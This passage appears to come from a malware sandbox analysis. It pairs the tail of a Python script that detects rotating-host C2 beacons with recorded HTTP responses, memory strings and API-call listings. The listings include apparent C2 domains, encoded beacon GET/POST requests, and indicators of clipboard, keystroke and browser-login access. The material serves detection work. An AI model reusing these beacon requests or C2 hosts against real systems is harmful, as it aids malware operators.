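    _request("GET", "/6pwo/?rdmhfXe=OcYLCa3XOMtt+Rsv8j1JEBYyKSs2FBnaDgwcqG8KHHMgaFOqYIh5VwBJiTVI7K2l1+vZ/nsgVnM6ADXGg1abiRcuJlWrvFsYiciiVw8Ks4AYAtrm9w==&AF=At8pGDY0Z", "www.1secondlending.one"),
    _request("GET", "/rk61/?rdmhfXe=4Jev6jkxg6xEO7DVmJ20iETfs2t7f6dacNocs9uTAtM/sd7AmwK5VubVBVupph+Y/y0F/E1wxEQcV5PZ7sI9IEZesAjm/l1NEB+do2leeTcUFeI7Uw==&AF=At8pGDY0Z", "www.supernutra01.online"),
    _request("GET", "/hakt/?rdmhfXe=Z3UZ9pkvUTN8eySircCOaDAcK9AA6JZfB0YdpGFssPaitvOOGMcOB1EIrUeEo9sxw4W4nK9e2r79OuzvY2TkP9tUb4eHWat+jQL942ZrdRgvNUE9NQ==&AF=At8pGDY0Z", "www.wine-drinkers.club"),
    _request("POST", "/6pwo/", "www.1secondlending.one",
             extra_headers=["Content-Type: application/x-www-form-urlencoded",
                            "Origin: http://www.1secondlending.one",
                            "Referer: http://www.1secondlending.one/6pwo/"],
             body="rdmhfXe=DewrBs2mT9lmqS0h8xo/FhwWGBpKZWTNPx5ns21VAUkobXqqdZEHSQNzlyFMh7ik9/OdrHAaMkApARbeuUnOj2o0bErQsAMAu92UJAkmv7cJP8LjujybVvacQulyg8c06pYoAu37enjigoPEZ8chlIeWCMkeUSXytXbjCrL8lVpsnGR6Rgi0nH0Fx5xQ"),
    _request("GET", "/index.html?lang=en", "www.example.com",
             ua="Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0"),
]

if __name__ == "__main__":
    result = correlate(SAMPLE_REQUESTS)
    for host, method, reasons in result["requests"]:
        print(f"{method:4} {host:26} {', '.join(reasons) or '-'}")
    print("rotating hosts:", result["rotating_hosts"])
```

A single beacon already scores on user agent and path shape, but the cross-host correlation is what turns four requests to four unrelated domains into one finding. Correlating by parameter shape rather than by server response matters here: the 404 responses recorded below show that most of these hosts do not answer as a live C2, so a detection keyed on a successful check-in would miss the traffic.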
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 19:10:51 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a 
padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 19:11:07 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a 
padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 19:11:09 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a 
padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Fri, 10 Jan 2025 19:11:12 GMT | Content-Type: text/html | Content-Length: 548 | Connection: close | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Fri, 10 Jan 2025 19:11:14 GMT | Content-Type: text/html | Content-Length: 548 | Connection: close | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx | Date: Fri, 10 Jan 2025 19:11:34 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close
                Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx | Date: Fri, 10 Jan 2025 19:11:37 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close
                Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx | Date: Fri, 10 Jan 2025 19:11:39 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->0
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | content-type: text/html | date: Fri, 10 Jan 2025 19:11:47 GMT | transfer-encoding: chunked | connection: close | Data Raw: 31 31 46 41 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 57 65 62 73 69 74 65 20 6e 6f 74 20 66 6f 75 6e 64 e2 80 a6 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 45 41 41 41 41 42 41 43 41 59 41 41 41 43 71 61 58 48 65 41 41 41 41 41 58 4e 53 52 30 49 41 72 73 34 63 36 51 41 41 43 48 68 4a 52 45 46 55 65 41 48 64 57 32 6c 73 48 45 55 57 72 71 71 5a 73 54 33 6a 32 46 6d 62 48 42 78 42 58 73 79 47 73 41 73 43 43 52 49 52 67 6a 69 63 41 32 4a 48 52 41 74 45 51 74 48 43 6a 32 69 31 69 68 41 53 67 6e 43 45 4f 46 6e 45 6a 39 6a 68 4e 41 67 70 49 43 37 78 41 36 52 6f 45 59 65 49 69 42 30 57 45 67 64 4c 69 59 53 53 72 41 54 69 32 4a 42 73 49 42 41 4d 50 6d 49 6e 64 6a 7a 6a 65 44 78 56 2b 37 33 78 74 4e 55 7a 37 75 6e 70 71 75 6b 5a 6a 2b 67 66 72 75 70 36 72 39 37 33 76 61 2b 72 71 32 71 36 32 35 77 56 2b 4c 6a 77 30 4b 75 52 6f 64 35 54 69 35 52 53 53 78 52 6e 69 78 52 6a 63 7a 68 6a 4e 59 43 74 55 55 78 52 79 54 6a 6a 67 79 67 47 59 52 75 45 72 5a 63 72 64 70 42 7a 66 71 42 36 7a 6e 6b 48 75 78 65 75 6a 35 4a 50 6f 51 37 67 2b 58 39 63 65 2b 6a 56 30 48 2f 37 42 74 5a 49 4a 65 39 6e 54 46 33 48 46 41 73 61 6f 58 41 32 44 6e 6d 2b 45 46 78 73 76 33 78 32 37 58 75 48 46 36 36 50 47 38 56 78 36 65 53 72 41 48 2f 73 66 4b 75 69 4c 39 72 39 45 4b 37 6b 2f 62 69 36 46 37 6e 67 61 70 73 77 53 6e 34 42 32 65 30 58 38 4b 71 32 59 30 30 50 6e 4e 4d 4f 6b 4b 57 44 62 77 4a 55 64 54 79 39 49 43 48 6a 2f 30 4c 79 56 32 66 42 38 71 55 5a 68 4c 38 4d 69 4e 44 64 77 34 30 62 6a 2f 67 52 55 50 67 52 70 4c 4a 39 32 39 2f 47 31 66 6a 68 51 69 64 50 58 41 6d 44 73 41 6a 54 44 2b 35 35 6a 34 42 49 52 2b 74 71 4a 65 57 48 49 4f 4f 4c 6d 42 70 4a 53 53 37 45 48 64 48 47 35 70 30 61 66 61 61 34 35 69 56 41 5a 55 66 4c 56 56 4b 70 2f 62 67 73 4d 36 5a 45 4c 6b 59 44 5a 32 63 46 35 7a 65 4d 4e 4 | Data Ascii (decoded here from the leading bytes; the dump is cut off inside the base64 favicon): 11FA<!doctype html><html class="no-js" lang=""><head>    <meta charset="utf-8">    <meta http-equiv="x-ua-compatible" content="ie=edge">    <title>Website not found…</title>    <meta name="description" content="">    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">    <link rel="icon" type="image/png" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUg
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | content-type: text/html | date: Fri, 10 Jan 2025 19:11:51 GMT | transfer-encoding: chunked | connection: close | Data Raw: 32 30 30 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 57 65 62 73 69 74 65 20 6e 6f 74 20 66 6f 75 6e 64 e2 80 a6 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 45 41 41 41 41 42 41 43 41 59 41 41 41 43 71 61 58 48 65 41 41 41 41 41 58 4e 53 52 30 49 41 72 73 34 63 36 51 41 41 43 48 68 4a 52 45 46 55 65 41 48 64 57 32 6c 73 48 45 55 57 72 71 71 5a 73 54 33 6a 32 46 6d 62 48 42 78 42 58 73 79 47 73 41 73 43 43 52 49 52 67 6a 69 63 41 32 4a 48 52 41 74 45 51 74 48 43 6a 32 69 31 69 68 41 0d 0a 33 31 45 41 0d 0a 53 67 6e 43 45 4f 46 6e 45 6a 39 6a 68 4e 41 67 70 49 43 37 78 41 36 52 6f 45 59 65 49 69 42 30 57 45 67 64 4c 69 59 53 53 72 41 54 69 32 4a 42 73 49 42 41 4d 50 6d 49 6e 64 6a 7a 6a 65 44 78 56 2b 37 33 78 74 4e 55 7a 37 75 6e 70 71 75 6b 5a 6a 2b 67 66 72 75 70 36 72 39 37 33 76 61 2b 72 71 32 71 36 32 35 77 56 2b 4c 6a 77 30 4b 75 52 6f 64 35 54 69 35 52 53 53 78 52 6e 69 78 52 6a 63 7a 68 6a 4e 59 43 74 55 55 78 52 79 54 6a 6a 67 79 67 47 59 52 75 45 72 5a 63 72 64 70 42 7a 66 71 42 36 7a 6e 6b 48 75 78 65 75 6a 35 4a 50 6f 51 37 67 2b 58 39 63 65 2b 6a 56 30 48 2f 37 42 74 5a 49 4a 65 39 6e 54 46 33 48 46 41 73 61 6f 58 41 32 44 6e 6d 2b 45 46 78 73 76 33 78 32 37 58 75 48 46 36 36 50 47 38 56 78 36 65 53 72 41 48 2f 73 66 4b 75 69 4c 39 72 39 45 4b 37 6b 2f 62 69 36 46 37 6e 67 61 70 73 77 53 6e 34 42 32 65 30 58 38 4b 71 32 59 30 30 50 6e 4e 4d 4f 6b 4b 57 44 62 77 4a 55 64 54 79 39 49 43 48 6a 2f 30 4c 79 56 32 66 42 38 71 55 5a 68 4c 38 4d 69 4e 44 64 77 34 30 62 6a 2f 67 52 55 50 67 52 70 4c 4a 39 32 39 2f 47 31 66 6a 68 51 69 64 50 58 41 6d 44 73 41 6a 54 44 2b 35 35 6a 34 42 49 52 2b 74 71 4a 65 57 48 49 4f 4f 4c 6d 42 70 4a 53 53 37 45 48 64 48 47 35 70 30 61 66 61 61 34 35 69 56 41 5a 55 66 4c 56 56 4b 70 2f 62 67 73 4d 36 5a 45 4c 6b 59 44 5a 32 6 | Data Ascii (decoded here from the leading bytes; the first 0x200-byte chunk is followed by a 0x31EA-byte chunk and the dump is cut off inside the base64 favicon): 200<!doctype html><html class="no-js" lang=""><head>    <meta charset="utf-8">    <meta http-equiv="x-ua-compatible" content="ie=edge">    <title>Website not found…</title>    <meta name="description" content="">    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">    <link rel="icon" type="image/png" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUg
                Source: ycBMGRFRlht.exe, 00000008.00000002.2615837301.000000000570B000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.oneeyetrousersnake.xyz
                Source: ycBMGRFRlht.exe, 00000008.00000002.2615837301.000000000570B000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.oneeyetrousersnake.xyz/4inx/
                Source: powercfg.exe, 00000005.00000002.2616496531.0000000007D3B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: powercfg.exe, 00000005.00000002.2616496531.0000000007D3B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: powercfg.exe, 00000005.00000002.2616496531.0000000007D3B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: powercfg.exe, 00000005.00000002.2616496531.0000000007D3B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: powercfg.exe, 00000005.00000002.2616496531.0000000007D3B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: powercfg.exe, 00000005.00000002.2616496531.0000000007D3B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: powercfg.exe, 00000005.00000002.2616496531.0000000007D3B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: powercfg.exe, 00000005.00000002.2614313409.000000000417A000.00000004.10000000.00040000.00000000.sdmp, powercfg.exe, 00000005.00000002.2616328430.00000000062F0000.00000004.00000800.00020000.00000000.sdmp, ycBMGRFRlht.exe, 00000008.00000002.2613874662.0000000003ABA000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://joker.com/?pk_campaign=Parking&pk_kwd=text
                Source: powercfg.exe, 00000005.00000002.2616328430.00000000062F0000.00000004.00000800.00020000.00000000.sdmp, powercfg.exe, 00000005.00000002.2614313409.0000000003FE8000.00000004.10000000.00040000.00000000.sdmp, ycBMGRFRlht.exe, 00000008.00000002.2613874662.0000000003928000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://kb.fastpanel.direct/troubleshoot/
                Source: powercfg.exe, 00000005.00000002.2611913316.0000000002E4D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: powercfg.exe, 00000005.00000002.2611913316.0000000002E78000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: powercfg.exe, 00000005.00000003.2074271825.0000000007D16000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: powercfg.exe, 00000005.00000002.2611913316.0000000002E4D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: powercfg.exe, 00000005.00000002.2611913316.0000000002E4D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033R
                Source: powercfg.exe, 00000005.00000002.2611913316.0000000002E4D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: powercfg.exe, 00000005.00000002.2611913316.0000000002E78000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: powercfg.exe, 00000005.00000002.2616496531.0000000007D3B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
                Source: C:\Users\user\Desktop\wWXR5js3k2.exe | Code function: 0_2_006C4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard | 0_2_006C4164
                Source: C:\Users\user\Desktop\wWXR5js3k2.exe | Code function: 0_2_006C3F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard | 0_2_006C3F66
                Source: C:\Users\user\Desktop\wWXR5js3k2.exe | Code function: 0_2_006B001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState | 0_2_006B001C
                Source: C:\Users\user\Desktop\wWXR5js3k2.exe | Code function: 0_2_006DCABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW | 0_2_006DCABC
